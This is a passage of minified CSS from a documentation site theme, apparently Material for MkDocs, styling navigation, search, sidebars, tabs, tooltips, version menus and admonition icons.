.md-nav__icon{display:none}.md-nav__item--section>.md-nav{display:block}.md-nav__item--section>.md-nav>.md-nav__list>.md-nav__item{padding:0}.md-nav__icon{border-radius:100%;height:.9rem;transition:background-color .25s;width:.9rem}.md-nav__icon:hover{background-color:var(--md-accent-fg-color--transparent)}.md-nav__icon:after{background-color:currentcolor;border-radius:100%;content:"";display:inline-block;height:100%;-webkit-mask-image:var(--md-nav-icon--next);mask-image:var(--md-nav-icon--next);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;transition:transform .25s;vertical-align:-.1rem;width:100%}[dir=rtl] .md-nav__icon:after{transform:rotate(180deg)}.md-nav__item--nested .md-nav__toggle:checked~.md-nav__link .md-nav__icon:after,.md-nav__item--nested .md-nav__toggle:indeterminate~.md-nav__link .md-nav__icon:after{transform:rotate(90deg)}.md-nav--lifted>.md-nav__list>.md-nav__item,.md-nav--lifted>.md-nav__list>.md-nav__item--nested,.md-nav--lifted>.md-nav__title{display:none}.md-nav--lifted>.md-nav__list>.md-nav__item--active{display:block;padding:0}.md-nav--lifted>.md-nav__list>.md-nav__item--active>.md-nav__link{background:var(--md-default-bg-color);box-shadow:0 0 .4rem .4rem var(--md-default-bg-color);font-weight:700;margin-top:0;padding:0 .6rem;position:sticky;top:0;z-index:1}.md-nav--lifted>.md-nav__list>.md-nav__item--active>.md-nav__link:not(.md-nav__link--index){pointer-events:none}.md-nav--lifted>.md-nav__list>.md-nav__item--active>.md-nav__link .md-nav__icon{display:none}.md-nav--lifted>.md-nav__list>.md-nav__item>[for]{color:var(--md-default-fg-color--light)}.md-nav--lifted .md-nav[data-md-level="1"]{display:block}[dir=ltr] .md-nav--lifted .md-nav[data-md-level="1"]>.md-nav__list>.md-nav__item{padding-right:.6rem}[dir=rtl] .md-nav--lifted 
.md-nav[data-md-level="1"]>.md-nav__list>.md-nav__item{padding-left:.6rem}.md-nav--integrated>.md-nav__list>.md-nav__item--active:not(.md-nav__item--nested){padding:0 .6rem}.md-nav--integrated>.md-nav__list>.md-nav__item--active:not(.md-nav__item--nested)>.md-nav__link{padding:0}[dir=ltr] .md-nav--integrated>.md-nav__list>.md-nav__item--active .md-nav--secondary{border-left:.05rem solid var(--md-primary-fg-color)}[dir=rtl] .md-nav--integrated>.md-nav__list>.md-nav__item--active .md-nav--secondary{border-right:.05rem solid var(--md-primary-fg-color)}.md-nav--integrated>.md-nav__list>.md-nav__item--active .md-nav--secondary{display:block;margin-bottom:1.25em}.md-nav--integrated>.md-nav__list>.md-nav__item--active .md-nav--secondary>.md-nav__title{display:none}}:root{--md-search-result-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-search{position:relative}@media screen and (min-width:60em){.md-search{padding:.2rem 0}}.no-js .md-search{display:none}.md-search__overlay{opacity:0;z-index:1}@media screen and (max-width:59.9375em){[dir=ltr] .md-search__overlay{left:-2.2rem}[dir=rtl] .md-search__overlay{right:-2.2rem}.md-search__overlay{background-color:var(--md-default-bg-color);border-radius:1rem;height:2rem;overflow:hidden;pointer-events:none;position:absolute;top:-1rem;transform-origin:center;transition:transform .3s .1s,opacity .2s .2s;width:2rem}[data-md-toggle=search]:checked~.md-header .md-search__overlay{opacity:1;transition:transform .4s,opacity .1s}}@media screen and (min-width:60em){[dir=ltr] .md-search__overlay{left:0}[dir=rtl] .md-search__overlay{right:0}.md-search__overlay{background-color:#0000008a;cursor:pointer;height:0;position:fixed;top:0;transition:width 0ms .25s,height 0ms .25s,opacity .25s;width:0}[data-md-toggle=search]:checked~.md-header .md-search__overlay{height:200vh;opacity:1;transition:width 0ms,height 0ms,opacity .25s;width:100%}}@media screen and (max-width:29.9375em){[data-md-toggle=search]:checked~.md-header .md-search__overlay{transform:scale(45)}}@media screen and (min-width:30em) and (max-width:44.9375em){[data-md-toggle=search]:checked~.md-header .md-search__overlay{transform:scale(60)}}@media screen and (min-width:45em) and (max-width:59.9375em){[data-md-toggle=search]:checked~.md-header .md-search__overlay{transform:scale(75)}}.md-search__inner{-webkit-backface-visibility:hidden;backface-visibility:hidden}@media screen and (max-width:59.9375em){[dir=ltr] .md-search__inner{left:0}[dir=rtl] .md-search__inner{right:0}.md-search__inner{height:0;opacity:0;overflow:hidden;position:fixed;top:0;transform:translateX(5%);transition:width 0ms .3s,height 0ms .3s,transform .15s cubic-bezier(.4,0,.2,1) .15s,opacity .15s .15s;width:0;z-index:2}[dir=rtl] .md-search__inner{transform:translateX(-5%)}[data-md-toggle=search]:checked~.md-header 
.md-search__inner{height:100%;opacity:1;transform:translateX(0);transition:width 0ms 0ms,height 0ms 0ms,transform .15s cubic-bezier(.1,.7,.1,1) .15s,opacity .15s .15s;width:100%}}@media screen and (min-width:60em){[dir=ltr] .md-search__inner{float:right}[dir=rtl] .md-search__inner{float:left}.md-search__inner{padding:.1rem 0;position:relative;transition:width .25s cubic-bezier(.1,.7,.1,1);width:11.7rem}}@media screen and (min-width:60em) and (max-width:76.1875em){[data-md-toggle=search]:checked~.md-header .md-search__inner{width:23.4rem}}@media screen and (min-width:76.25em){[data-md-toggle=search]:checked~.md-header .md-search__inner{width:34.4rem}}.md-search__form{background-color:var(--md-default-bg-color);box-shadow:0 0 .6rem #0000;height:2.4rem;position:relative;transition:color .25s,background-color .25s;z-index:2}@media screen and (min-width:60em){.md-search__form{background-color:#00000042;border-radius:.1rem;height:1.8rem}.md-search__form:hover{background-color:#ffffff1f}}[data-md-toggle=search]:checked~.md-header .md-search__form{background-color:var(--md-default-bg-color);border-radius:.1rem .1rem 0 0;box-shadow:0 0 .6rem #00000012;color:var(--md-default-fg-color)}[dir=ltr] .md-search__input{padding-left:3.6rem;padding-right:2.2rem}[dir=rtl] .md-search__input{padding-left:2.2rem;padding-right:3.6rem}.md-search__input{background:#0000;font-size:.9rem;height:100%;position:relative;text-overflow:ellipsis;width:100%;z-index:2}.md-search__input::placeholder{transition:color .25s}.md-search__input::placeholder,.md-search__input~.md-search__icon{color:var(--md-default-fg-color--light)}.md-search__input::-ms-clear{display:none}@media screen and (max-width:59.9375em){.md-search__input{font-size:.9rem;height:2.4rem;width:100%}}@media screen and (min-width:60em){[dir=ltr] .md-search__input{padding-left:2.2rem}[dir=rtl] 
.md-search__input{padding-right:2.2rem}.md-search__input{color:inherit;font-size:.8rem}.md-search__input::placeholder{color:var(--md-primary-bg-color--light)}.md-search__input+.md-search__icon{color:var(--md-primary-bg-color)}[data-md-toggle=search]:checked~.md-header .md-search__input{text-overflow:clip}[data-md-toggle=search]:checked~.md-header .md-search__input+.md-search__icon{color:var(--md-default-fg-color--light)}[data-md-toggle=search]:checked~.md-header .md-search__input::placeholder{color:#0000}}.md-search__icon{cursor:pointer;display:inline-block;height:1.2rem;transition:color .25s,opacity .25s;width:1.2rem}.md-search__icon:hover{opacity:.7}[dir=ltr] .md-search__icon[for=__search]{left:.5rem}[dir=rtl] .md-search__icon[for=__search]{right:.5rem}.md-search__icon[for=__search]{position:absolute;top:.3rem;z-index:2}[dir=rtl] .md-search__icon[for=__search] svg{transform:scaleX(-1)}@media screen and (max-width:59.9375em){[dir=ltr] .md-search__icon[for=__search]{left:.8rem}[dir=rtl] .md-search__icon[for=__search]{right:.8rem}.md-search__icon[for=__search]{top:.6rem}.md-search__icon[for=__search] svg:first-child{display:none}}@media screen and (min-width:60em){.md-search__icon[for=__search]{pointer-events:none}.md-search__icon[for=__search] svg:last-child{display:none}}[dir=ltr] .md-search__options{right:.5rem}[dir=rtl] .md-search__options{left:.5rem}.md-search__options{pointer-events:none;position:absolute;top:.3rem;z-index:2}@media screen and (max-width:59.9375em){[dir=ltr] .md-search__options{right:.8rem}[dir=rtl] .md-search__options{left:.8rem}.md-search__options{top:.6rem}}[dir=ltr] .md-search__options>.md-icon{margin-left:.2rem}[dir=rtl] .md-search__options>.md-icon{margin-right:.2rem}.md-search__options>.md-icon{color:var(--md-default-fg-color--light);opacity:0;transform:scale(.75);transition:transform .15s cubic-bezier(.1,.7,.1,1),opacity 
.15s}.md-search__options>.md-icon:not(.focus-visible){-webkit-tap-highlight-color:transparent;outline:none}[data-md-toggle=search]:checked~.md-header .md-search__input:valid~.md-search__options>.md-icon{opacity:1;pointer-events:auto;transform:scale(1)}[data-md-toggle=search]:checked~.md-header .md-search__input:valid~.md-search__options>.md-icon:hover{opacity:.7}[dir=ltr] .md-search__suggest{padding-left:3.6rem;padding-right:2.2rem}[dir=rtl] .md-search__suggest{padding-left:2.2rem;padding-right:3.6rem}.md-search__suggest{align-items:center;color:var(--md-default-fg-color--lighter);display:flex;font-size:.9rem;height:100%;opacity:0;position:absolute;top:0;transition:opacity 50ms;white-space:nowrap;width:100%}@media screen and (min-width:60em){[dir=ltr] .md-search__suggest{padding-left:2.2rem}[dir=rtl] .md-search__suggest{padding-right:2.2rem}.md-search__suggest{font-size:.8rem}}[data-md-toggle=search]:checked~.md-header .md-search__suggest{opacity:1;transition:opacity .3s .1s}[dir=ltr] .md-search__output{border-bottom-left-radius:.1rem}[dir=ltr] .md-search__output,[dir=rtl] .md-search__output{border-bottom-right-radius:.1rem}[dir=rtl] .md-search__output{border-bottom-left-radius:.1rem}.md-search__output{overflow:hidden;position:absolute;width:100%;z-index:1}@media screen and (max-width:59.9375em){.md-search__output{bottom:0;top:2.4rem}}@media screen and (min-width:60em){.md-search__output{opacity:0;top:1.9rem;transition:opacity .4s}[data-md-toggle=search]:checked~.md-header .md-search__output{box-shadow:var(--md-shadow-z3);opacity:1}}.md-search__scrollwrap{-webkit-backface-visibility:hidden;backface-visibility:hidden;background-color:var(--md-default-bg-color);height:100%;overflow-y:auto;touch-action:pan-y}@media (-webkit-max-device-pixel-ratio:1),(max-resolution:1dppx){.md-search__scrollwrap{transform:translateZ(0)}}@media screen and (min-width:60em) and (max-width:76.1875em){.md-search__scrollwrap{width:23.4rem}}@media screen and 
(min-width:76.25em){.md-search__scrollwrap{width:34.4rem}}@media screen and (min-width:60em){.md-search__scrollwrap{max-height:0;scrollbar-color:var(--md-default-fg-color--lighter) #0000;scrollbar-width:thin}[data-md-toggle=search]:checked~.md-header .md-search__scrollwrap{max-height:75vh}.md-search__scrollwrap:hover{scrollbar-color:var(--md-accent-fg-color) #0000}.md-search__scrollwrap::-webkit-scrollbar{height:.2rem;width:.2rem}.md-search__scrollwrap::-webkit-scrollbar-thumb{background-color:var(--md-default-fg-color--lighter)}.md-search__scrollwrap::-webkit-scrollbar-thumb:hover{background-color:var(--md-accent-fg-color)}}.md-search-result{color:var(--md-default-fg-color);word-break:break-word}.md-search-result__meta{background-color:var(--md-default-fg-color--lightest);color:var(--md-default-fg-color--light);font-size:.64rem;line-height:1.8rem;padding:0 .8rem;scroll-snap-align:start}@media screen and (min-width:60em){[dir=ltr] .md-search-result__meta{padding-left:2.2rem}[dir=rtl] .md-search-result__meta{padding-right:2.2rem}}.md-search-result__list{list-style:none;margin:0;padding:0;-webkit-user-select:none;-moz-user-select:none;user-select:none}.md-search-result__item{box-shadow:0 -.05rem var(--md-default-fg-color--lightest)}.md-search-result__item:first-child{box-shadow:none}.md-search-result__link{display:block;outline:none;scroll-snap-align:start;transition:background-color .25s}.md-search-result__link:focus,.md-search-result__link:hover{background-color:var(--md-accent-fg-color--transparent)}.md-search-result__link:last-child p:last-child{margin-bottom:.6rem}.md-search-result__more>summary{cursor:pointer;display:block;outline:none;position:sticky;scroll-snap-align:start;top:0;z-index:1}.md-search-result__more>summary::marker{display:none}.md-search-result__more>summary::-webkit-details-marker{display:none}.md-search-result__more>summary>div{color:var(--md-typeset-a-color);font-size:.64rem;padding:.75em .8rem;transition:color .25s,background-color 
.25s}@media screen and (min-width:60em){[dir=ltr] .md-search-result__more>summary>div{padding-left:2.2rem}[dir=rtl] .md-search-result__more>summary>div{padding-right:2.2rem}}.md-search-result__more>summary:focus>div,.md-search-result__more>summary:hover>div{background-color:var(--md-accent-fg-color--transparent);color:var(--md-accent-fg-color)}.md-search-result__more[open]>summary{background-color:var(--md-default-bg-color)}.md-search-result__article{overflow:hidden;padding:0 .8rem;position:relative}@media screen and (min-width:60em){[dir=ltr] .md-search-result__article{padding-left:2.2rem}[dir=rtl] .md-search-result__article{padding-right:2.2rem}}[dir=ltr] .md-search-result__icon{left:0}[dir=rtl] .md-search-result__icon{right:0}.md-search-result__icon{color:var(--md-default-fg-color--light);height:1.2rem;margin:.5rem;position:absolute;width:1.2rem}@media screen and (max-width:59.9375em){.md-search-result__icon{display:none}}.md-search-result__icon:after{background-color:currentcolor;content:"";display:inline-block;height:100%;-webkit-mask-image:var(--md-search-result-icon);mask-image:var(--md-search-result-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:100%}[dir=rtl] .md-search-result__icon:after{transform:scaleX(-1)}.md-search-result .md-typeset{color:var(--md-default-fg-color--light);font-size:.64rem;line-height:1.6}.md-search-result .md-typeset h1{color:var(--md-default-fg-color);font-size:.8rem;font-weight:400;line-height:1.4;margin:.55rem 0}.md-search-result .md-typeset h1 mark{text-decoration:none}.md-search-result .md-typeset h2{color:var(--md-default-fg-color);font-size:.64rem;font-weight:700;line-height:1.6;margin:.5em 0}.md-search-result .md-typeset h2 mark{text-decoration:none}.md-search-result__terms{color:var(--md-default-fg-color);display:block;font-size:.64rem;font-style:italic;margin:.5em 0}.md-search-result 
mark{background-color:initial;color:var(--md-accent-fg-color);text-decoration:underline}.md-select{position:relative;z-index:1}.md-select__inner{background-color:var(--md-default-bg-color);border-radius:.1rem;box-shadow:var(--md-shadow-z2);color:var(--md-default-fg-color);left:50%;margin-top:.2rem;max-height:0;opacity:0;position:absolute;top:calc(100% - .2rem);transform:translate3d(-50%,.3rem,0);transition:transform .25s 375ms,opacity .25s .25s,max-height 0ms .5s}.md-select:focus-within .md-select__inner,.md-select:hover .md-select__inner{max-height:10rem;opacity:1;transform:translate3d(-50%,0,0);transition:transform .25s cubic-bezier(.1,.7,.1,1),opacity .25s,max-height 0ms}.md-select__inner:after{border-bottom:.2rem solid #0000;border-bottom-color:var(--md-default-bg-color);border-left:.2rem solid #0000;border-right:.2rem solid #0000;border-top:0;content:"";height:0;left:50%;margin-left:-.2rem;margin-top:-.2rem;position:absolute;top:0;width:0}.md-select__list{border-radius:.1rem;font-size:.8rem;list-style-type:none;margin:0;max-height:inherit;overflow:auto;padding:0}.md-select__item{line-height:1.8rem}[dir=ltr] .md-select__link{padding-left:.6rem;padding-right:1.2rem}[dir=rtl] .md-select__link{padding-left:1.2rem;padding-right:.6rem}.md-select__link{cursor:pointer;display:block;outline:none;scroll-snap-align:start;transition:background-color .25s,color .25s;width:100%}.md-select__link:focus,.md-select__link:hover{color:var(--md-accent-fg-color)}.md-select__link:focus{background-color:var(--md-default-fg-color--lightest)}.md-sidebar{align-self:flex-start;flex-shrink:0;padding:1.2rem 0;position:sticky;top:2.4rem;width:12.1rem}@media print{.md-sidebar{display:none}}@media screen and (max-width:76.1875em){[dir=ltr] .md-sidebar--primary{left:-12.1rem}[dir=rtl] .md-sidebar--primary{right:-12.1rem}.md-sidebar--primary{background-color:var(--md-default-bg-color);display:block;height:100%;position:fixed;top:0;transform:translateX(0);transition:transform .25s 
cubic-bezier(.4,0,.2,1),box-shadow .25s;width:12.1rem;z-index:5}[data-md-toggle=drawer]:checked~.md-container .md-sidebar--primary{box-shadow:var(--md-shadow-z3);transform:translateX(12.1rem)}[dir=rtl] [data-md-toggle=drawer]:checked~.md-container .md-sidebar--primary{transform:translateX(-12.1rem)}.md-sidebar--primary .md-sidebar__scrollwrap{bottom:0;left:0;margin:0;overflow:hidden;position:absolute;right:0;scroll-snap-type:none;top:0}}@media screen and (min-width:76.25em){.md-sidebar{height:0}.no-js .md-sidebar{height:auto}.md-header--lifted~.md-container .md-sidebar{top:4.8rem}}.md-sidebar--secondary{display:none;order:2}@media screen and (min-width:60em){.md-sidebar--secondary{height:0}.no-js .md-sidebar--secondary{height:auto}.md-sidebar--secondary:not([hidden]){display:block}.md-sidebar--secondary .md-sidebar__scrollwrap{touch-action:pan-y}}.md-sidebar__scrollwrap{scrollbar-gutter:stable;-webkit-backface-visibility:hidden;backface-visibility:hidden;margin:0 .2rem;overflow-y:auto;scrollbar-color:var(--md-default-fg-color--lighter) #0000;scrollbar-width:thin}.md-sidebar__scrollwrap::-webkit-scrollbar{height:.2rem;width:.2rem}.md-sidebar__scrollwrap:focus-within,.md-sidebar__scrollwrap:hover{scrollbar-color:var(--md-accent-fg-color) #0000}.md-sidebar__scrollwrap:focus-within::-webkit-scrollbar-thumb,.md-sidebar__scrollwrap:hover::-webkit-scrollbar-thumb{background-color:var(--md-default-fg-color--lighter)}.md-sidebar__scrollwrap:focus-within::-webkit-scrollbar-thumb:hover,.md-sidebar__scrollwrap:hover::-webkit-scrollbar-thumb:hover{background-color:var(--md-accent-fg-color)}@supports selector(::-webkit-scrollbar){.md-sidebar__scrollwrap{scrollbar-gutter:auto}[dir=ltr] .md-sidebar__inner{padding-right:calc(100% - 11.5rem)}[dir=rtl] .md-sidebar__inner{padding-left:calc(100% - 11.5rem)}}@media screen and (max-width:76.1875em){.md-overlay{background-color:#0000008a;height:0;opacity:0;position:fixed;top:0;transition:width 0ms .25s,height 0ms .25s,opacity 
.25s;width:0;z-index:5}[data-md-toggle=drawer]:checked~.md-overlay{height:100%;opacity:1;transition:width 0ms,height 0ms,opacity .25s;width:100%}}@keyframes facts{0%{height:0}to{height:.65rem}}@keyframes fact{0%{opacity:0;transform:translateY(100%)}50%{opacity:0}to{opacity:1;transform:translateY(0)}}:root{--md-source-forks-icon:url('data:image/svg+xml;charset=utf-8,
');--md-source-repositories-icon:url('data:image/svg+xml;charset=utf-8,
');--md-source-stars-icon:url('data:image/svg+xml;charset=utf-8,
');--md-source-version-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-source{-webkit-backface-visibility:hidden;backface-visibility:hidden;display:block;font-size:.65rem;line-height:1.2;outline-color:var(--md-accent-fg-color);transition:opacity .25s;white-space:nowrap}.md-source:hover{opacity:.7}.md-source__icon{display:inline-block;height:2.4rem;vertical-align:middle;width:2rem}[dir=ltr] .md-source__icon svg{margin-left:.6rem}[dir=rtl] .md-source__icon svg{margin-right:.6rem}.md-source__icon svg{margin-top:.6rem}[dir=ltr] .md-source__icon+.md-source__repository{padding-left:2rem}[dir=rtl] .md-source__icon+.md-source__repository{padding-right:2rem}[dir=ltr] .md-source__icon+.md-source__repository{margin-left:-2rem}[dir=rtl] .md-source__icon+.md-source__repository{margin-right:-2rem}[dir=ltr] .md-source__repository{margin-left:.6rem}[dir=rtl] .md-source__repository{margin-right:.6rem}.md-source__repository{display:inline-block;max-width:calc(100% - 1.2rem);overflow:hidden;text-overflow:ellipsis;vertical-align:middle}.md-source__facts{display:flex;font-size:.55rem;gap:.4rem;list-style-type:none;margin:.1rem 0 0;opacity:.75;overflow:hidden;padding:0;width:100%}.md-source__repository--active .md-source__facts{animation:facts .25s ease-in}.md-source__fact{overflow:hidden;text-overflow:ellipsis}.md-source__repository--active .md-source__fact{animation:fact .4s ease-out}[dir=ltr] .md-source__fact:before{margin-right:.1rem}[dir=rtl] 
.md-source__fact:before{margin-left:.1rem}.md-source__fact:before{background-color:currentcolor;content:"";display:inline-block;height:.6rem;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;vertical-align:text-top;width:.6rem}.md-source__fact:nth-child(1n+2){flex-shrink:0}.md-source__fact--version:before{-webkit-mask-image:var(--md-source-version-icon);mask-image:var(--md-source-version-icon)}.md-source__fact--stars:before{-webkit-mask-image:var(--md-source-stars-icon);mask-image:var(--md-source-stars-icon)}.md-source__fact--forks:before{-webkit-mask-image:var(--md-source-forks-icon);mask-image:var(--md-source-forks-icon)}.md-source__fact--repositories:before{-webkit-mask-image:var(--md-source-repositories-icon);mask-image:var(--md-source-repositories-icon)}.md-tabs{background-color:var(--md-primary-fg-color);color:var(--md-primary-bg-color);display:block;line-height:1.3;overflow:auto;width:100%;z-index:3}@media print{.md-tabs{display:none}}@media screen and (max-width:76.1875em){.md-tabs{display:none}}.md-tabs[hidden]{pointer-events:none}[dir=ltr] .md-tabs__list{margin-left:.2rem}[dir=rtl] .md-tabs__list{margin-right:.2rem}.md-tabs__list{contain:content;list-style:none;margin:0;overflow:auto;padding:0;scrollbar-width:none;white-space:nowrap}.md-tabs__list::-webkit-scrollbar{display:none}.md-tabs__item{display:inline-block;height:2.4rem;padding-left:.6rem;padding-right:.6rem}.md-tabs__link{-webkit-backface-visibility:hidden;backface-visibility:hidden;display:block;font-size:.7rem;margin-top:.8rem;opacity:.7;outline-color:var(--md-accent-fg-color);outline-offset:.2rem;transition:transform .4s cubic-bezier(.1,.7,.1,1),opacity .25s}.md-tabs__link--active,.md-tabs__link:focus,.md-tabs__link:hover{color:inherit;opacity:1}.md-tabs__item:nth-child(2) .md-tabs__link{transition-delay:20ms}.md-tabs__item:nth-child(3) 
.md-tabs__link{transition-delay:40ms}.md-tabs__item:nth-child(4) .md-tabs__link{transition-delay:60ms}.md-tabs__item:nth-child(5) .md-tabs__link{transition-delay:80ms}.md-tabs__item:nth-child(6) .md-tabs__link{transition-delay:.1s}.md-tabs__item:nth-child(7) .md-tabs__link{transition-delay:.12s}.md-tabs__item:nth-child(8) .md-tabs__link{transition-delay:.14s}.md-tabs__item:nth-child(9) .md-tabs__link{transition-delay:.16s}.md-tabs__item:nth-child(10) .md-tabs__link{transition-delay:.18s}.md-tabs__item:nth-child(11) .md-tabs__link{transition-delay:.2s}.md-tabs__item:nth-child(12) .md-tabs__link{transition-delay:.22s}.md-tabs__item:nth-child(13) .md-tabs__link{transition-delay:.24s}.md-tabs__item:nth-child(14) .md-tabs__link{transition-delay:.26s}.md-tabs__item:nth-child(15) .md-tabs__link{transition-delay:.28s}.md-tabs__item:nth-child(16) .md-tabs__link{transition-delay:.3s}.md-tabs[hidden] .md-tabs__link{opacity:0;transform:translateY(50%);transition:transform 0ms .1s,opacity .1s}:root{--md-tag-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-typeset .md-tags{margin-bottom:.75em;margin-top:-.125em}[dir=ltr] .md-typeset .md-tag{margin-right:.5em}[dir=rtl] .md-typeset .md-tag{margin-left:.5em}.md-typeset .md-tag{background:var(--md-default-fg-color--lightest);border-radius:2.4rem;display:inline-block;font-size:.64rem;font-weight:700;letter-spacing:normal;line-height:1.6;margin-bottom:.5em;padding:.3125em .9375em;vertical-align:middle}.md-typeset .md-tag[href]{-webkit-tap-highlight-color:transparent;color:inherit;outline:none;transition:color 125ms,background-color 125ms}.md-typeset .md-tag[href]:focus,.md-typeset .md-tag[href]:hover{background-color:var(--md-accent-fg-color);color:var(--md-accent-bg-color)}[id]>.md-typeset .md-tag{vertical-align:text-top}.md-typeset .md-tag-icon:before{background-color:var(--md-default-fg-color--lighter);content:"";display:inline-block;height:1.2em;margin-right:.4em;-webkit-mask-image:var(--md-tag-icon);mask-image:var(--md-tag-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;transition:background-color 125ms;vertical-align:text-bottom;width:1.2em}.md-typeset .md-tag-icon[href]:focus:before,.md-typeset .md-tag-icon[href]:hover:before{background-color:var(--md-accent-bg-color)}@keyframes pulse{0%{box-shadow:0 0 0 0 var(--md-default-fg-color--lightest);transform:scale(.95)}75%{box-shadow:0 0 0 .625em #0000;transform:scale(1)}to{box-shadow:0 0 0 0 #0000;transform:scale(.95)}}:root{--md-tooltip-width:20rem}.md-tooltip{-webkit-backface-visibility:hidden;backface-visibility:hidden;background-color:var(--md-default-bg-color);border-radius:.1rem;box-shadow:var(--md-shadow-z2);color:var(--md-default-fg-color);font-family:var(--md-text-font-family);left:clamp(var(--md-tooltip-0,0rem) + .8rem,var(--md-tooltip-x),100vw + var(--md-tooltip-0,0rem) + .8rem - var(--md-tooltip-width) - 2 * .8rem);max-width:calc(100vw - 
1.6rem);opacity:0;position:absolute;top:var(--md-tooltip-y);transform:translateY(-.4rem);transition:transform 0ms .25s,opacity .25s,z-index .25s;width:var(--md-tooltip-width);z-index:0}.md-tooltip--active{opacity:1;transform:translateY(0);transition:transform .25s cubic-bezier(.1,.7,.1,1),opacity .25s,z-index 0ms;z-index:2}.focus-visible>.md-tooltip,.md-tooltip:target{outline:var(--md-accent-fg-color) auto}.md-tooltip__inner{font-size:.64rem;padding:.8rem}.md-tooltip__inner.md-typeset>:first-child{margin-top:0}.md-tooltip__inner.md-typeset>:last-child{margin-bottom:0}.md-annotation{font-weight:400;outline:none;white-space:normal}[dir=rtl] .md-annotation{direction:rtl}.md-annotation:not([hidden]){display:inline-block;line-height:1.325}.md-annotation__index{cursor:pointer;font-family:var(--md-code-font-family);font-size:.85em;margin:0 1ch;outline:none;position:relative;-webkit-user-select:none;-moz-user-select:none;user-select:none;z-index:0}.md-annotation .md-annotation__index{color:#fff;transition:z-index .25s}.md-annotation .md-annotation__index:focus,.md-annotation .md-annotation__index:hover{color:#fff}.md-annotation__index:after{background-color:var(--md-default-fg-color--lighter);border-radius:2ch;content:"";height:2.2ch;left:-.125em;margin:0 -.4ch;padding:0 .4ch;position:absolute;top:0;transition:color .25s,background-color .25s;width:calc(100% + 1.2ch);width:max(2.2ch,100% + 1.2ch);z-index:-1}@media not all and (prefers-reduced-motion){[data-md-visible]>.md-annotation__index:after{animation:pulse 2s infinite}}.md-tooltip--active+.md-annotation__index:after{animation:none;transition:color .25s,background-color .25s}code 
.md-annotation__index{font-family:var(--md-code-font-family);font-size:inherit}.md-tooltip--active+.md-annotation__index,:hover>.md-annotation__index{color:var(--md-accent-bg-color)}.md-tooltip--active+.md-annotation__index:after,:hover>.md-annotation__index:after{background-color:var(--md-accent-fg-color)}.md-tooltip--active+.md-annotation__index{animation:none;transition:none;z-index:2}.md-annotation__index [data-md-annotation-id]{display:inline-block;line-height:90%}.md-annotation__index [data-md-annotation-id]:before{content:attr(data-md-annotation-id);display:inline-block;padding-bottom:.1em;transform:scale(1.15);transition:transform .4s cubic-bezier(.1,.7,.1,1);vertical-align:.065em}@media not print{.md-annotation__index [data-md-annotation-id]:before{content:"+"}:focus-within>.md-annotation__index [data-md-annotation-id]:before{transform:scale(1.25) rotate(45deg)}}[dir=ltr] .md-top{margin-left:50%}[dir=rtl] .md-top{margin-right:50%}.md-top{background-color:var(--md-default-bg-color);border-radius:1.6rem;box-shadow:var(--md-shadow-z2);color:var(--md-default-fg-color--light);cursor:pointer;display:block;font-size:.7rem;outline:none;padding:.4rem .8rem;position:fixed;top:3.2rem;transform:translate(-50%);transition:color 125ms,background-color 125ms,transform 125ms cubic-bezier(.4,0,.2,1),opacity 125ms;z-index:2}@media print{.md-top{display:none}}[dir=rtl] .md-top{transform:translate(50%)}.md-top[hidden]{opacity:0;pointer-events:none;transform:translate(-50%,.2rem);transition-duration:0ms}[dir=rtl] .md-top[hidden]{transform:translate(50%,.2rem)}.md-top:focus,.md-top:hover{background-color:var(--md-accent-fg-color);color:var(--md-accent-bg-color)}.md-top svg{display:inline-block;vertical-align:-.5em}@keyframes hoverfix{0%{pointer-events:none}}:root{--md-version-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-version{flex-shrink:0;font-size:.8rem;height:2.4rem}[dir=ltr] .md-version__current{margin-left:1.4rem;margin-right:.4rem}[dir=rtl] .md-version__current{margin-left:.4rem;margin-right:1.4rem}.md-version__current{color:inherit;cursor:pointer;outline:none;position:relative;top:.05rem}[dir=ltr] .md-version__current:after{margin-left:.4rem}[dir=rtl] .md-version__current:after{margin-right:.4rem}.md-version__current:after{background-color:currentcolor;content:"";display:inline-block;height:.6rem;-webkit-mask-image:var(--md-version-icon);mask-image:var(--md-version-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:.4rem}.md-version__list{background-color:var(--md-default-bg-color);border-radius:.1rem;box-shadow:var(--md-shadow-z2);color:var(--md-default-fg-color);list-style-type:none;margin:.2rem .8rem;max-height:0;opacity:0;overflow:auto;padding:0;position:absolute;scroll-snap-type:y mandatory;top:.15rem;transition:max-height 0ms .5s,opacity .25s .25s;z-index:3}.md-version:focus-within .md-version__list,.md-version:hover .md-version__list{max-height:10rem;opacity:1;transition:max-height 0ms,opacity .25s}@media (pointer:coarse){.md-version:hover .md-version__list{animation:hoverfix .25s forwards}.md-version:focus-within .md-version__list{animation:none}}.md-version__item{line-height:1.8rem}[dir=ltr] .md-version__link{padding-left:.6rem;padding-right:1.2rem}[dir=rtl] .md-version__link{padding-left:1.2rem;padding-right:.6rem}.md-version__link{cursor:pointer;display:block;outline:none;scroll-snap-align:start;transition:color .25s,background-color .25s;white-space:nowrap;width:100%}.md-version__link:focus,.md-version__link:hover{color:var(--md-accent-fg-color)}.md-version__link:focus{background-color:var(--md-default-fg-color--lightest)}:root{--md-admonition-icon--note:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--abstract:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--info:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--tip:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--success:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--question:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--warning:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--failure:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--danger:url('data:image/svg+xml;charset=utf-8,
